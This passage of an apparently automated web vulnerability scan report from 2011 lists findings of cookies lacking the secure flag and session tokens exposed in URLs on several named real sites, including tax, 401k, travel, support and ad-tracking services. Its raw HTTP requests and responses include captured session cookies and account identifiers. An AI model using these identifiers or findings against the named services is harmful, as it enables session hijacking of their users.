Date: Sat, 07 May 2011 01:49:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: SessionStateGUID=6faf2a0c-e41b-6cdb-5915-512ec79c7b90; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 6653

<img src='../images/tnlogo.gif' width='96' height='23'>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Tax Notebook</title>
       <LINK href="../Main.css" typ
...[SNIP]...
12.12. https://www.taxnotebook.com/Login/TNLogin.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.taxnotebook.com
Path:   /Login/TNLogin.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Login/TNLogin.aspx HTTP/1.1
Host: www.taxnotebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refaccno=759456; ASPSESSIONIDAABTDSBD=FMKFIPIDJPCACPMKKHGMNJHE

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: SessionStateGUID=819ade93-ce22-7d31-b53b-15e41cb9a483; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 10347

<img src='../images/tnlogo.gif' width='96' height='23'>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Tax Notebook</title>
       <link href="../Main.css" typ
...[SNIP]...
12.13. https://www.taxnotebook.com/tnstart.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.taxnotebook.com
Path:   /tnstart.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tnstart.asp?welcome=PA7594560 HTTP/1.1
Host: www.taxnotebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Sat, 07 May 2011 01:44:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: Login/TNLogin.aspx
Content-Length: 139
Content-Type: text/html
Set-Cookie: refaccno=759456; path=/
Set-Cookie: ASPSESSIONIDCSTDRTTC=HAGFLEACNJKIJHHDDPDCFBCH; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="Login/TNLogin.aspx">here</a>.</body>
12.14. https://www.trpc401k.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.trpc401k.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.trpc401k.com
Connection: keep-alive
Referer: http://www.trpcweb.com/content/account-support
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:45:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=r0m1zyj0xiq1vqe0djlxyhea; path=/; HttpOnly
Set-Cookie: QTWEB=CSS=BLUE3-NS.css&LANGUAGE=; path=/; secure; HttpOnly
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 12169

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head>
<META http-equiv="Content-Type" content="text/html">
<meta http-equiv="Content-Type" content=
...[SNIP]...
12.15. https://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pub/agent.dll?qscr=fbak&&zz=1247500409281&&zz=1304739644741 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=fbak&&zz=1247500409281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DFAQ%25252520Support%2525253ASearch%25252520Results%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/pub/agent.dll%2525253Fqscr%2525253Dfbak%25252526%25252526zz%2525253D1247500409281%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; s1=`user=v.8,0,EX01CC562A07$F4$B5203000g$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50K$A9$11$90$F1$8C$A5$D1$82$AB$89$FB!e02000`133

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:40:52 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX0183E3F010$F4$B5204000k$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$83$A7rJ$D3$B5$CD3$82$AB$89$FB!e02000`129; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`airp=v.1,AUS`gacct=v.1,1,215819496`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 155628


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; c
...[SNIP]...
12.16. https://www.gofileroom.com/lbmc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.gofileroom.com
Path:   /lbmc

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lbmc HTTP/1.1
Host: www.gofileroom.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Content-Length: 154
Content-Type: text/html
Location: http://www.gofileroom.com/lbmc/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:44:04 GMT
Set-Cookie: BIGipServerGFR_WWW_HTTP=3090734602.20480.0000; path=/

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.gofileroom.com/lbmc/">here</a></body>
12.17. https://www.paypal.com/en_US/i/btn/btn_xpressCheckout.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paypal.com
Path:   /en_US/i/btn/btn_xpressCheckout.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/i/btn/btn_xpressCheckout.gif HTTP/1.1
Host: www.paypal.com
Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/cart.php?suggest=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:56:08 GMT
Server: Apache
Set-Cookie: Apache=10.191.114.122.1304729768396297; path=/; expires=Mon, 29-Apr-41 00:56:08 GMT
Last-Modified: Tue, 23 Oct 2007 03:08:13 GMT
Accept-Ranges: bytes
Content-Length: 3091
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..*....OXS........{...........:......................+..............6.:b...........E................................ax....o....j...........9........O..\......................d....../Tu.......
...[SNIP]...
13. Session token in URL  previous  next
There are 13 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

13.1. http://ads.adonion.com/serving/showbanner.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://ads.adonion.com
Path:   /serving/showbanner.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /serving/showbanner.php?zone_id=45274&user_id=17557&site_id=15418&size_id=1&type_id=2&flag=12&b1=%239cbce8&b2=%23000000&b3=%23FFFFFF&b4=%23000000&ref=http%3A%2F%2Fkroogy.com%2Fsearch%2Fweb%2FLinkbucks%2520vlad%2520modelS&token=ZGs2zNQg0yEhMS3P1PklWi0pMM7PIdh8fSoqz88i03z5alom3iLRfA&random=7483 HTTP/1.1
Host: ads.adonion.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:03:52 GMT
Server: Apache/2.2.17 (Fedora)
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Advertisement</title>
<meta http-equiv="Content
...[SNIP]...
13.2. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=add&advid=2250&token=EXPD1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=naush134;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; V=wOebwAz4UvVv; FC1-WC=^53620_1_2QLwy

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Mon, 30-Apr-2012 22:33:36 GMT; Path=/
Set-Cookie: cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F05%2F2011%3BEXPD1; Domain=.contextweb.com; Expires=Sat, 09-Apr-2016 22:33:36 GMT; Path=/
Content-Type: image/gif
Date: Fri, 06 May 2011 22:33:35 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
13.3. https://broker.gotoassist.com/ds/queryPost.flow  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://broker.gotoassist.com
Path:   /ds/queryPost.flow

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ds/queryPost.flow?SessionInfo=237918117%3A6229CD39A2E2A4C%3A1&Portal=lbmc&Template=ds%2FphoneModeRedemption.tmpl&Form=lbmcSmartPage&ReturnUrl=https%3A%2F%2Fbroker.gotoassist.com%2Fh%2Flbmc&Name_Full=&CompanyName=&Question=&Continue=Continue HTTP/1.1
Host: broker.gotoassist.com
Connection: keep-alive
Referer: https://broker.gotoassist.com/h/lbmc?Portal=lbmc&Target=ds%2FqueryPost.flow&Template=ds%2FphoneModeRedemption.tmpl&JavaScript=true&Form=lbmcSmartPage&Name_Full=&CompanyName=&Question=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dtsSession=SessionInfo%3D237918117%253A6229CD39A2E2A4C

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 7600

       <html>


<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>GoToAssist: live online customer support</title>

<script language="JavaScript">
<!--
function empty
...[SNIP]...
13.4. https://broker.gotoassist.com/javaScriptTester.tmpl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://broker.gotoassist.com
Path:   /javaScriptTester.tmpl

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /javaScriptTester.tmpl?SessionInfo=237918117:6229CD39A2E2A4C&Portal=lbmc&enabled=true&screenWidth=1920&screenHeight=1156&windowWidth=1066&windowHeight=925&javaEnabled=false HTTP/1.1
Host: broker.gotoassist.com
Connection: keep-alive
Referer: https://broker.gotoassist.com/h/lbmc?Portal=lbmc&Target=ds%2FqueryPost.flow&Template=ds%2FphoneModeRedemption.tmpl&JavaScript=true&Form=lbmcSmartPage&Name_Full=&CompanyName=&Question=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dtsSession=SessionInfo%3D237918117%253A6229CD39A2E2A4C

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:43:54 GMT
Server: Apache
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

OK
13.5. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /activityi;src=2588783;type=nausc547;cat=naush134;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Fri, 06 May 2011 22:33:33 GMT
Expires: Fri, 06 May 2011 22:33:33 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 975

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- LeadBack Pixel:
...[SNIP]...
<!-- ContextWeb Pixel: TargetCast -->
<img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=2250&token=EXPD1" width="1" height="1" border="0"><!-- Yahoo Pixel: TargetCast -->
...[SNIP]...
13.6. http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/ps/ifr  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com
Path:   /ps/ifr

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ps/ifr?container=friendconnect&mid=0&nocache=0&view=profile&parent=http%3A%2F%2Fallatsea.net%2F&url=http%3A%2F%2Fwww.google.com%2Ffriendconnect%2Fgadgets%2Frecommended_pages.xml&communityId=14672211859858017590&caller=http%3A%2F%2Fallatsea.net%2Fby-category%2FCruising&rpctoken=160477709 HTTP/1.1
Host: iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Location: http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-opensocial.googleusercontent.com/gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/recommended_pages.xml&container=peoplesense&parent=http://allatsea.net/&mid=0&view=profile&d=0.558.7&lang=en&communityId=14672211859858017590&caller=http://allatsea.net/by-category/Cruising#st=e%3DAOG8GaCH24Wbs%252FtHKSRzPbuUa3ClOhJwKR%252FI44hbysGf8a07Je3yd3sBXpdpHwrFjASbHwSJ4MIemKBMIo2xfKbmj9wjhfcE8dAY80JCjkY7BmK8NYqUHT63L8mN4MfhCVVCqEcWQg7a3%252Bo67lUB25VpXtvh%252FpUT1FYoYxNiG2pUvcyfVdsyVpr%252FqRUoU9I%252F0RKyb6lmisuInwl7shMbDVED1HO7rVfvD3%252ByCIC31wfivaSKlaDKZwQ%253D%26c%3Dpeoplesense&rpctoken=160477709&
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 21:10:04 GMT
Expires: Fri, 06 May 2011 21:10:04 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 875

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="http://iqavu79a908u5vcecp0pq80hhbhkv33b-a-fc-o
...[SNIP]...
13.7. http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/ps/ifr  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com
Path:   /ps/ifr

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ps/ifr?container=friendconnect&mid=0&nocache=0&view=profile&parent=http%3A%2F%2Fallatsea.net%2F&url=http%3A%2F%2Fwww.google.com%2Ffriendconnect%2Fgadgets%2FnewsletterSubscribe.xml&communityId=14672211859858017590&caller=http%3A%2F%2Fallatsea.net%2Fsubscribe.htm&rpctoken=1596537502&prefs=%7B%22newsletterHeadlineText%22%3A%22Subscribe+to+All+At+Sea%21%22%2C%22newsletterStandardText%22%3A%22Get+updates+of+our+latest+content%22%7D HTTP/1.1
Host: k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Location: http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-opensocial.googleusercontent.com/gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/newsletterSubscribe.xml&container=peoplesense&parent=http://allatsea.net/&mid=0&view=profile&d=0.558.7&lang=en&up_newsletterHeadlineText=Subscribe+to+All+At+Sea!&up_newsletterStandardText=Get+updates+of+our+latest+content&communityId=14672211859858017590&caller=http://allatsea.net/subscribe.htm#st=e%3DAOG8GaCwxSmZcFnNUPAD8vyeNrdxLPncr%252B4kUmdTY8LXILQPe2Ds7i3%252F3XUvkcFQ7zbslUFrEerTrBQjjB83S4aXP5rD2Q8OxyrCU9ufr91BJgf0x2LUkdvtrUi%252B%252F4kisNEncsPNqCHHEQGfat2OZiqW0Rtj5%252Fx0YAM0i%252F2yGVMhWuiffmP4%252B9ifPUWHSq%252BzSuQheTRplR1yDnKJ%252Fb7j7zVJg9HNvgp%252FviOFdhSXFjQhBYtEmSfg1wM%253D%26c%3Dpeoplesense&rpctoken=1596537502&
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 21:13:03 GMT
Expires: Fri, 06 May 2011 21:13:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 1002

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="http://k830suiki828goudg9448o6bp0tpu5r3-a-fc-o
...[SNIP]...
13.8. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=0adb3f43-ad3c-4c7f-9bf8-7997b41d316a&hostname=www.compliancepoint.com&location=%2Fsub_serv_isc_pci.asp&url=http%3A%2F%2Fwww.compliancepoint.com%2Fsub_serv_isc_pci.asp%3Fgclid%3DCJu4wszV1KgCFQ075QodRCyFgQ&sessionID=1304748967447.90099&fpc=7ea9e7b-12fc9194618-5db8a672-1&ts1304748975271.0&r_sessionID=&hash_flag=&shr=&count=1 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.compliancepoint.com/sub_serv_isc_pci.asp?gclid=CJu4wszV1KgCFQ075QodRCyFgQ
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Sat, 07 May 2011 01:21:37 GMT
